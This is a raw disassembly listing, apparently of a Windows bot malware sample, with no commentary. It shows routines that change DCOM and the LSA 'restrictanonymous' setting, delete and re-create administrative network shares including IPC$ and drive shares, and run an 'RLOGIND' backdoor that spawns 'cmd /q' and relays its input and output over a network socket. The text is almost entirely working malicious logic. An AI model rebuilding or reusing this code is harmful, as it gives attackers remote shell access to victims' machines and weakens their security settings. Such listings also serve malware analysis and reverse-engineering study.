var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_44B790, edi
jnz loc_413C63
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_44B730 ; RegOpenKeyExA
test eax, eax
jnz short loc_413BBC
mov ax, word_441E28
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_44B6E4 ; RegSetValueExA
test eax, eax
jz short loc_413B9E
push offset aSecureDisableD ; "[SECURE]: Disable DCOM failed."
jmp short loc_413BA3
; ---------------------------------------------------------------------------
loc_413B9E: ; CODE XREF: sub_413B31+64�j
push offset aSecureDcomDisa ; "[SECURE]: DCOM disabled."
loc_413BA3: ; CODE XREF: sub_413B31+6B�j
lea eax, [ebp+var_214]
push eax
call sub_418D70
pop ecx
pop ecx
push [ebp+var_4]
call dword_44B69C ; RegCloseKey
jmp short loc_413BCF
; ---------------------------------------------------------------------------
loc_413BBC: ; CODE XREF: sub_413B31+36�j
lea eax, [ebp+var_214]
push offset aSecureFailed_1 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_418D70
pop ecx
pop ecx
loc_413BCF: ; CODE XREF: sub_413B31+89�j
cmp [ebp+arg_C], edi
jnz short loc_413BEE
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_413BEE: ; CODE XREF: sub_413B31+A1�j
lea eax, [ebp+var_214]
push eax
call sub_4035E1
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_44B730 ; RegOpenKeyExA
test eax, eax
jnz short loc_413C5C
lea eax, [ebp+var_8]
push 4
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call dword_44B6E4 ; RegSetValueExA
test eax, eax
jz short loc_413C3E
push offset aSecureFailed_2 ; "[SECURE]: Failed to restrict access to "...
jmp short loc_413C43
; ---------------------------------------------------------------------------
loc_413C3E: ; CODE XREF: sub_413B31+104�j
push offset aSecureRestrict ; "[SECURE]: Restricted access to the IPC$"...
loc_413C43: ; CODE XREF: sub_413B31+10B�j
lea eax, [ebp+var_214]
push eax
call sub_418D70
pop ecx
pop ecx
push [ebp+var_4]
call dword_44B69C ; RegCloseKey
jmp short loc_413C76
; ---------------------------------------------------------------------------
loc_413C5C: ; CODE XREF: sub_413B31+E2�j
push offset aSecureFailed_3 ; "[SECURE]: Failed to open IPC$ Restricti"...
jmp short loc_413C68
; ---------------------------------------------------------------------------
loc_413C63: ; CODE XREF: sub_413B31+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_413C68: ; CODE XREF: sub_413B31+130�j
lea eax, [ebp+var_214]
push eax
call sub_418D70
pop ecx
pop ecx
loc_413C76: ; CODE XREF: sub_413B31+129�j
cmp [ebp+arg_C], edi
jnz short loc_413C95
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_413C95: ; CODE XREF: sub_413B31+148�j
lea eax, [ebp+var_214]
push eax
call sub_4035E1
cmp dword_44B7B8, edi
pop ecx
jnz loc_413E10
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_413CB8: ; CODE XREF: sub_413B31+2C3�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call dword_44B60C
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_413D55
cmp eax, 0EAh
jz short loc_413D55
mov esi, offset off_441DE8
loc_413CE9: ; CODE XREF: sub_413B31+21D�j
push dword ptr [esi]
push edi
call sub_40A46C
pop ecx
pop ecx
push dword ptr [esi]
test eax, eax
jnz short loc_413D00
push offset aSecureShareSDe ; "[SECURE]: Share '%s' deleted."
jmp short loc_413D05
; ---------------------------------------------------------------------------
loc_413D00: ; CODE XREF: sub_413B31+1C6�j
push offset aSecureFailed_4 ; "[SECURE]: Failed to delete '%s' share."
loc_413D05: ; CODE XREF: sub_413B31+1CD�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_418EF0
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_413D38
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_413D38: ; CODE XREF: sub_413B31+1EB�j
lea eax, [ebp+var_214]
push eax
call sub_4035E1
add esi, 8
pop ecx
cmp esi, offset aIpc ; "IPC$"
jl short loc_413CE9
jmp loc_413DED
; ---------------------------------------------------------------------------
loc_413D55: ; CODE XREF: sub_413B31+1AA�j
; sub_413B31+1B1�j
mov esi, [ebp+var_8]
push 1
pop ebx
cmp [ebp+var_4], ebx
jb loc_413DE4
loc_413D64: ; CODE XREF: sub_413B31+2AF�j
mov edi, [esi]
push edi
call sub_41B030
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_413DD9
push edi
call sub_40A359
push eax
push 0
call sub_40A46C
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_413D93
push offset aSecureShareS_0 ; "[SECURE]: Share '%S' deleted."
jmp short loc_413D98
; ---------------------------------------------------------------------------
loc_413D93: ; CODE XREF: sub_413B31+259�j
push offset aSecureFailed_5 ; "[SECURE]: Failed to delete '%S' share."
loc_413D98: ; CODE XREF: sub_413B31+260�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_418EF0
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_413DCC
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_413DCC: ; CODE XREF: sub_413B31+27F�j
lea eax, [ebp+var_214]
push eax
call sub_4035E1
pop ecx
loc_413DD9: ; CODE XREF: sub_413B31+242�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_413D64
xor edi, edi
loc_413DE4: ; CODE XREF: sub_413B31+22D�j
push [ebp+var_8]
call dword_44B750
loc_413DED: ; CODE XREF: sub_413B31+21F�j
cmp [ebp+var_10], 0EAh
jz loc_413CB8
lea eax, [ebp+var_214]
push offset aSecureNetworkS ; "[SECURE]: Network shares deleted."
push eax
call sub_418D70
pop ecx
pop ecx
pop ebx
jmp short loc_413E23
; ---------------------------------------------------------------------------
loc_413E10: ; CODE XREF: sub_413B31+177�j
lea eax, [ebp+var_214]
push offset aSecureNetapi32 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_418D70
pop ecx
pop ecx
loc_413E23: ; CODE XREF: sub_413B31+2DD�j
cmp [ebp+arg_C], edi
jnz short loc_413E41
push edi
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_413E41: ; CODE XREF: sub_413B31+2F5�j
lea eax, [ebp+var_214]
push eax
call sub_4035E1
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_413B31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413E55 proc near ; CODE XREF: sub_413AD1:loc_413B18�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push esi
push edi
xor edi, edi
cmp dword_44B790, edi
jnz loc_413F83
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_44B730 ; RegOpenKeyExA
test eax, eax
jnz short loc_413EE0
mov ax, word_442060
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom_0 ; "EnableDCOM"
push [ebp+var_4]
call dword_44B6E4 ; RegSetValueExA
test eax, eax
jz short loc_413EC2
push offset aSecureEnableDc ; "[SECURE]: Enable DCOM failed."
jmp short loc_413EC7
; ---------------------------------------------------------------------------
loc_413EC2: ; CODE XREF: sub_413E55+64�j
push offset aSecureDcomEnab ; "[SECURE]: DCOM enabled."
loc_413EC7: ; CODE XREF: sub_413E55+6B�j
lea eax, [ebp+var_220]
push eax
call sub_418D70
pop ecx
pop ecx
push [ebp+var_4]
call dword_44B69C ; RegCloseKey
jmp short loc_413EF3
; ---------------------------------------------------------------------------
loc_413EE0: ; CODE XREF: sub_413E55+36�j
lea eax, [ebp+var_220]
push offset aSecureFailed_6 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_418D70
pop ecx
pop ecx
loc_413EF3: ; CODE XREF: sub_413E55+89�j
cmp [ebp+arg_C], edi
jnz short loc_413F12
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_413F12: ; CODE XREF: sub_413E55+A1�j
lea eax, [ebp+var_220]
push eax
call sub_4035E1
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_44B730 ; RegOpenKeyExA
test eax, eax
jnz short loc_413F7C
lea eax, [ebp+var_8]
push 4
push eax
push 4
push edi
push offset aRestrictanon_0 ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], edi
call dword_44B6E4 ; RegSetValueExA
test eax, eax
jz short loc_413F5E
push offset aSecureFailed_7 ; "[SECURE]: Failed to unrestrict access t"...
jmp short loc_413F63
; ---------------------------------------------------------------------------
loc_413F5E: ; CODE XREF: sub_413E55+100�j
push offset aSecureUnrestri ; "[SECURE]: Unrestricted access to the IP"...
loc_413F63: ; CODE XREF: sub_413E55+107�j
lea eax, [ebp+var_220]
push eax
call sub_418D70
pop ecx
pop ecx
push [ebp+var_4]
call dword_44B69C ; RegCloseKey
jmp short loc_413F96
; ---------------------------------------------------------------------------
loc_413F7C: ; CODE XREF: sub_413E55+E2�j
push offset aSecureFailed_8 ; "[SECURE]: Failed to open IPC$ restricti"...
jmp short loc_413F88
; ---------------------------------------------------------------------------
loc_413F83: ; CODE XREF: sub_413E55+13�j
push offset aSecureAdvapi_0 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_413F88: ; CODE XREF: sub_413E55+12C�j
lea eax, [ebp+var_220]
push eax
call sub_418D70
pop ecx
pop ecx
loc_413F96: ; CODE XREF: sub_413E55+125�j
cmp [ebp+arg_C], edi
jnz short loc_413FB5
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_413FB5: ; CODE XREF: sub_413E55+144�j
lea eax, [ebp+var_220]
push eax
call sub_4035E1
cmp dword_44B7B8, edi
pop ecx
jnz loc_414127
mov esi, offset off_441DE8
loc_413FD3: ; CODE XREF: sub_413E55+1E7�j
push dword ptr [esi+4]
push dword ptr [esi]
push edi
call sub_40A3C0
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_413FEE
push offset aSecureShareSAd ; "[SECURE]: Share '%s' added."
jmp short loc_413FF3
; ---------------------------------------------------------------------------
loc_413FEE: ; CODE XREF: sub_413E55+190�j
push offset aSecureFailed_9 ; "[SECURE]: Failed to add '%s' share."
loc_413FF3: ; CODE XREF: sub_413E55+197�j
lea eax, [ebp+var_220]
push 200h
push eax
call sub_418EF0
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_414026
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_414026: ; CODE XREF: sub_413E55+1B5�j
lea eax, [ebp+var_220]
push eax
call sub_4035E1
add esi, 8
pop ecx
cmp esi, offset off_441DF8
jl short loc_413FD3
push ebx
call ds:dword_4943F8
mov edi, eax
mov bl, 41h
test edi, edi
jz loc_41410F
loc_414051: ; CODE XREF: sub_413E55+2B4�j
mov eax, edi
and eax, 1
cmp al, 1
jnz loc_414105
cmp bl, 41h
jz loc_414105
movsx esi, bl
push esi
push offset aC_0 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_418EF0
push esi
push offset aC_1 ; "%c:\\"
lea eax, [ebp+var_20]
push 0Ah
push eax
call sub_418EF0
add esp, 20h
lea eax, [ebp+var_20]
push eax
call dword_44B720 ; GetDriveTypeA
cmp eax, 3
jnz short loc_414105
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_40A3C0
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
jnz short loc_4140BF
push offset aSecureShareS_1 ; "[SECURE]: Share '%s' added."
jmp short loc_4140C4
; ---------------------------------------------------------------------------
loc_4140BF: ; CODE XREF: sub_413E55+261�j
push offset aSecureFaile_10 ; "[SECURE]: Failed to add '%s' share."
loc_4140C4: ; CODE XREF: sub_413E55+268�j
lea eax, [ebp+var_220]
push 200h
push eax
call sub_418EF0
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_4140F8
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_4140F8: ; CODE XREF: sub_413E55+287�j
lea eax, [ebp+var_220]
push eax
call sub_4035E1
pop ecx
loc_414105: ; CODE XREF: sub_413E55+203�j
; sub_413E55+20C�j ...
inc bl
shr edi, 1
jnz loc_414051
loc_41410F: ; CODE XREF: sub_413E55+1F6�j
lea eax, [ebp+var_220]
push offset aSecureNetwor_0 ; "[SECURE]: Network shares added."
push eax
call sub_418D70
pop ecx
xor edi, edi
pop ecx
pop ebx
jmp short loc_41413A
; ---------------------------------------------------------------------------
loc_414127: ; CODE XREF: sub_413E55+173�j
lea eax, [ebp+var_220]
push offset aSecureNetapi_0 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_418D70
pop ecx
pop ecx
loc_41413A: ; CODE XREF: sub_413E55+2D0�j
cmp [ebp+arg_C], edi
jnz short loc_414158
push edi
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_414158: ; CODE XREF: sub_413E55+2E8�j
lea eax, [ebp+var_220]
push eax
call sub_4035E1
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_413E55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41416C proc near ; CODE XREF: sub_41301C+1AF�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_4142BD
imul edi, 234h
mov esi, eax
xor ebx, ebx
mov eax, dword_44D064[edi]
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
mov edi, ds:dword_4942F4
pop ecx
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_41448F
lea eax, [ebp+var_C]
push ebx
push eax
call edi
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_4141D7
call ds:dword_4942F0
push eax
push offset aRlogindFaile_2 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_403655
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
jmp short loc_414211
; ---------------------------------------------------------------------------
loc_4141D7: ; CODE XREF: sub_41416C+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_414541
lea eax, [ebp+var_C]
push ebx
push eax
call edi
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_414218
call ds:dword_4942F0
push eax
push offset aRlogindFaile_3 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_403655
pop ecx
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_4943D4
loc_414211: ; CODE XREF: sub_41416C+69�j
xor eax, eax
jmp loc_4142B8
; ---------------------------------------------------------------------------
loc_414218: ; CODE XREF: sub_41416C+82�j
mov eax, [esi+10h]
push 0FFFFFFFFh
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push ebx
push eax
push 3
call ds:dword_4943FC
sub eax, ebx
jz short loc_414272
dec eax
jz short loc_41426C
dec eax
jz short loc_414258
call ds:dword_4942F0
push eax
push offset aRlogindWaitfor ; "[RLOGIND]: WaitForMultipleObjects error"...
call sub_403655
pop ecx
pop ecx
jmp short loc_414287
; ---------------------------------------------------------------------------
loc_414258: ; CODE XREF: sub_41416C+D5�j
mov edi, ds:dword_4943D4
push ebx
push dword ptr [esi+14h]
call edi
push ebx
push dword ptr [esi+10h]
call edi
jmp short loc_414287
; ---------------------------------------------------------------------------
loc_41426C: ; CODE XREF: sub_41416C+D2�j
push ebx
push dword ptr [esi+10h]
jmp short loc_414276
; ---------------------------------------------------------------------------
loc_414272: ; CODE XREF: sub_41416C+CF�j
push ebx
push dword ptr [esi+14h]
loc_414276: ; CODE XREF: sub_41416C+104�j
call ds:dword_4943D4
push 1
push dword ptr [esi+8]
call ds:dword_4943B8
loc_414287: ; CODE XREF: sub_41416C+EA�j
; sub_41416C+FE�j
push dword ptr [esi+10h]
mov edi, ds:dword_4942E0
call edi
push dword ptr [esi+14h]
call edi
push dword ptr [esi+8]
call edi
push dword ptr [esi]
call edi
push dword ptr [esi+4]
call edi
push dword ptr [esi+0Ch]
call dword_44B758 ; closesocket
push esi
call sub_417480
pop ecx
push 1
pop eax
loc_4142B8: ; CODE XREF: sub_41416C+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_41416C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142BD proc near ; CODE XREF: sub_41416C+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_416A10
mov esi, eax
pop ecx
cmp esi, edi
jz loc_4143A7
mov ebx, ds:dword_4943E8
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
mov [esi+4], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ebx
mov edi, ds:dword_4942E0
test eax, eax
jnz short loc_414320
call ds:dword_4942F0
push eax
push offset aRlogindFaile_4 ; "[RLOGIND]: Failed to create shell stdou"...
jmp short loc_414340
; ---------------------------------------------------------------------------
loc_414320: ; CODE XREF: sub_4142BD+53�j
lea eax, [ebp+var_14]
push 0
push eax
lea eax, [esi+4]
push eax
lea eax, [ebp+var_4]
push eax
call ebx
test eax, eax
jnz short loc_414348
call ds:dword_4942F0
push eax
push offset aRlogindFaile_5 ; "[RLOGIND]: Failed to create shell stdin"...
loc_414340: ; CODE XREF: sub_4142BD+61�j
call sub_403655
pop ecx
jmp short loc_414376
; ---------------------------------------------------------------------------
loc_414348: ; CODE XREF: sub_4142BD+75�j
push [ebp+arg_0]
push [ebp+var_8]
push [ebp+var_4]
call sub_4143B6
add esp, 0Ch
mov [esi+8], eax
push [ebp+var_4]
call edi
push [ebp+var_8]
call edi
cmp dword ptr [esi+8], 0
jnz short loc_4143AB
push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to execute shell."
call sub_4035E1
loc_414376: ; CODE XREF: sub_4142BD+89�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_414382
push [ebp+var_4]
call edi
loc_414382: ; CODE XREF: sub_4142BD+BE�j
cmp [ebp+var_8], 0
jz short loc_41438D
push [ebp+var_8]
call edi
loc_41438D: ; CODE XREF: sub_4142BD+C9�j
mov eax, [esi]
test eax, eax
jz short loc_414396
push eax
call edi
loc_414396: ; CODE XREF: sub_4142BD+D4�j
mov eax, [esi+4]
test eax, eax
jz short loc_4143A0
push eax
call edi
loc_4143A0: ; CODE XREF: sub_4142BD+DE�j
push esi
call sub_417480
pop ecx
loc_4143A7: ; CODE XREF: sub_4142BD+1D�j
xor eax, eax
jmp short loc_4143B1
; ---------------------------------------------------------------------------
loc_4143AB: ; CODE XREF: sub_4142BD+AD�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_4143B1: ; CODE XREF: sub_4142BD+EC�j
pop edi
pop esi
pop ebx
leave
retn
sub_4142BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4143B6 proc near ; CODE XREF: sub_4142BD+94�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi
lea eax, [ebp+var_58]
push esi
push eax
mov [ebp+var_4], esi
call sub_4189A0
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_4189A0
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
add esp, 18h
mov [ebp+var_20], eax
lea eax, [ebp+var_18]
mov [ebp+var_58], edi
mov edi, ds:dword_494290
push esi
push 1
push 2
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi
push eax
push ebx
call edi
push eax
call ds:dword_4943E4
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_494330
test eax, eax
jz short loc_414472
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_44D060[eax], ecx
call ds:dword_4942E0
jmp short loc_414488
; ---------------------------------------------------------------------------
loc_414472: ; CODE XREF: sub_4143B6+9A�j
call ds:dword_4942F0
push eax
push offset aRlogindFaile_7 ; "[RLOGIND]: Failed to execute shell, err"...
call sub_403655
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_414488: ; CODE XREF: sub_4143B6+BA�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_4143B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41448F proc near ; DATA XREF: sub_41416C+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
mov ebx, ds:dword_4942DC
push edi
mov edi, [ebp+arg_0]
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
loc_4144B8: ; CODE XREF: sub_41448F+8F�j
call ebx
test eax, eax
jz short loc_414520
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+arg_0], eax
jbe short loc_4144F3
loc_4144C9: ; CODE XREF: sub_41448F+62�j
mov cl, [ebp+esi+var_C8]
cmp cl, 0Ah
jnz short loc_4144E3
cmp dl, 0Dh
jz short loc_4144E3
mov [ebp+eax+var_1B0], 0Dh
inc eax
loc_4144E3: ; CODE XREF: sub_41448F+44�j
; sub_41448F+49�j
mov [ebp+eax+var_1B0], cl
inc eax
inc esi
mov dl, cl
cmp esi, [ebp+arg_0]
jb short loc_4144C9
loc_4144F3: ; CODE XREF: sub_41448F+38�j
push 0
push eax
lea eax, [ebp+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_44B710 ; send
test eax, eax
jle short loc_414520
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
jmp short loc_4144B8
; ---------------------------------------------------------------------------
loc_414520: ; CODE XREF: sub_41448F+2D�j
; sub_41448F+79�j
mov esi, ds:dword_4942F0
call esi
cmp eax, 6Dh
jz short loc_41453C
call esi
push eax
push offset aRlogindSession ; "[RLOGIND]: SessionReadShellThread exite"...
call sub_403655
pop ecx
pop ecx
loc_41453C: ; CODE XREF: sub_41448F+9C�j
pop edi
pop esi
pop ebx
leave
retn
sub_41448F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414541 proc near ; DATA XREF: sub_41416C+71�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_414544: ; DATA XREF: .data:004438C0�o
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_0]
xor esi, esi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
loc_41455A: ; CODE XREF: sub_414541+39�j
; sub_414541+D7�j ...
push ebx
lea eax, [ebp+arg_0+3]
push 1
push eax
push dword ptr [edi+0Ch]
call dword_44B6D8 ; recv
test eax, eax
jle loc_41465F
cmp [ebp+var_10], ebx
jbe short loc_41457C
dec [ebp+var_10]
jmp short loc_41455A
; ---------------------------------------------------------------------------
loc_41457C: ; CODE XREF: sub_414541+34�j
mov al, byte ptr [ebp+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_41463F
cmp al, 8
mov [ebp+var_C], ebx
jz short loc_4145EC
cmp al, 7Fh
jz short loc_4145EC
cmp al, 3
jnz short loc_4145A7
push ebx
push ebx
call ds:dword_494400
jmp short loc_414613
; ---------------------------------------------------------------------------
loc_4145A7: ; CODE XREF: sub_414541+5A�j
cmp al, 15h
jnz short loc_4145C9
xor esi, esi
mov [ebp+var_8], 20h
mov [ebp+var_7], 58h
mov [ebp+var_6], 58h
mov [ebp+var_5], 58h
mov [ebp+var_4], 0Dh
mov [ebp+var_3], 0Ah
push 6
jmp short loc_4145FF
; ---------------------------------------------------------------------------
loc_4145C9: ; CODE XREF: sub_414541+68�j
mov [ebp+esi+var_DC], al
inc esi
push 1
cmp al, 0Dh
mov [ebp+var_8], al
pop ecx
jnz short loc_414600
mov [ebp+esi+var_DC], 0Ah
mov [ebp+var_7], 0Ah
inc esi
push 2
jmp short loc_4145FF
; ---------------------------------------------------------------------------
loc_4145EC: ; CODE XREF: sub_414541+52�j
; sub_414541+56�j
cmp esi, ebx
jbe short loc_414616
dec esi
mov [ebp+var_8], 8
mov [ebp+var_7], 20h
mov [ebp+var_6], 8
push 3
loc_4145FF: ; CODE XREF: sub_414541+86�j
; sub_414541+A9�j
pop ecx
loc_414600: ; CODE XREF: sub_414541+98�j
push ebx
lea eax, [ebp+var_8]
push ecx
push eax
push dword ptr [edi+0Ch]
call dword_44B710 ; send
test eax, eax
jle short loc_41465F
loc_414613: ; CODE XREF: sub_414541+64�j
mov al, byte ptr [ebp+arg_0+3]
loc_414616: ; CODE XREF: sub_414541+AD�j
cmp al, 0Dh
jnz loc_41455A
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push dword ptr [edi+4]
call ds:dword_4942E4
test eax, eax
jz short loc_41465F
xor esi, esi
jmp loc_41455A
; ---------------------------------------------------------------------------
loc_41463F: ; CODE XREF: sub_414541+47�j
cmp [ebp+var_C], ebx
jnz short loc_414650
mov [ebp+var_C], 1
jmp loc_41455A
; ---------------------------------------------------------------------------
loc_414650: ; CODE XREF: sub_414541+101�j
mov [ebp+var_10], 0Ah
mov [ebp+var_C], ebx
jmp loc_41455A
; ---------------------------------------------------------------------------
loc_41465F: ; CODE XREF: sub_414541+2B�j
; sub_414541+D0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_414541 endp
